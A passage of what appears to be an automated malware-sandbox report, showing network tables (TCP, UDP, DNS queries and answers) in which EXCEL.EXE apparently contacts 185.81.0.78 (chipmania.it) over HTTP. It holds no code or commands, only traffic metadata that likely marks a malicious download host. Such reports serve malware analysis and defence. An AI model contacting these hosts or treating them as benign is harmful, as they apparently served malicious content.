Feb 20, 2021 09:48:08.240374088 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240394115 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240411997 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240423918 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240423918 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240459919 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.241363049 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297489882 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297517061 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297533035 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297550917 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297584057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297601938 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297617912 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297619104 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297642946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297646999 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297648907 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297650099 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297665119 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297667980 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297686100 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297698021 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297703028 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297710896 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297724009 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297736883 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297749996 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297761917 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297826052 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297847986 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297864914 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297874928 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297883034 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297889948 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297909975 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297925949 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297952890 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297979116 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297997952 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.298006058 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.298028946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.298029900 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 09:48:07.978209019 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:48:08.037940979 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:48:19.789324045 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:48:19.843091011 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:48:19.858103991 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:48:19.906888008 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.491444111 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:07.551477909 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.557696104 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:07.618220091 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.935848951 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:07.984754086 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.987725019 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:08.039216995 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:11.780280113 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:11.846560955 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:11.849558115 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:11.912435055 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:11.916096926 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:12.074311018 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:12.078605890 CET | 57564 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:12.137561083 CET | 53 | 57564 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:12.141418934 CET | 63009 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:12.232424974 CET | 53 | 63009 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 20, 2021 09:48:07.978209019 CET | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:07.491444111 CET | 192.168.2.22 | 8.8.8.8 | 0xa0c2 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:07.557696104 CET | 192.168.2.22 | 8.8.8.8 | 0xfa16 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:11.780280113 CET | 192.168.2.22 | 8.8.8.8 | 0x1d23 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:11.849558115 CET | 192.168.2.22 | 8.8.8.8 | 0xc63d | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:11.916096926 CET | 192.168.2.22 | 8.8.8.8 | 0xea66 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:12.078605890 CET | 192.168.2.22 | 8.8.8.8 | 0x87a5 | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:12.141418934 CET | 192.168.2.22 | 8.8.8.8 | 0x376d | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 20, 2021 09:48:08.037940979 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | chipmania.it | CNAME (Canonical name) | IN (0x0001) | ||
Feb 20, 2021 09:48:08.037940979 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 185.81.0.78 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 09:49:07.551477909 CET | 8.8.8.8 | 192.168.2.22 | 0xa0c2 | No error (0) | 176.58.123.25 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 09:49:07.618220091 CET | 8.8.8.8 | 192.168.2.22 | 0xfa16 | No error (0) | 176.58.123.25 | A (IP address) | IN (0x0001) | ||
Feb 20, 2021 09:49:11.846560955 CET | 8.8.8.8 | 192.168.2.22 | 0x1d23 | Name error (3) | none | none | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:11.912435055 CET | 8.8.8.8 | 192.168.2.22 | 0xc63d | Name error (3) | none | none | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:12.074311018 CET | 8.8.8.8 | 192.168.2.22 | 0xea66 | Name error (3) | none | none | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:12.137561083 CET | 8.8.8.8 | 192.168.2.22 | 0x87a5 | Name error (3) | none | none | A (IP address) | IN (0x0001) | |
Feb 20, 2021 09:49:12.232424974 CET | 8.8.8.8 | 192.168.2.22 | 0x376d | Name error (3) | none | none | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 09:48:08.114717007 CET | 0 | OUT | |
Feb 20, 2021 09:48:08.181039095 CET | 2 | IN |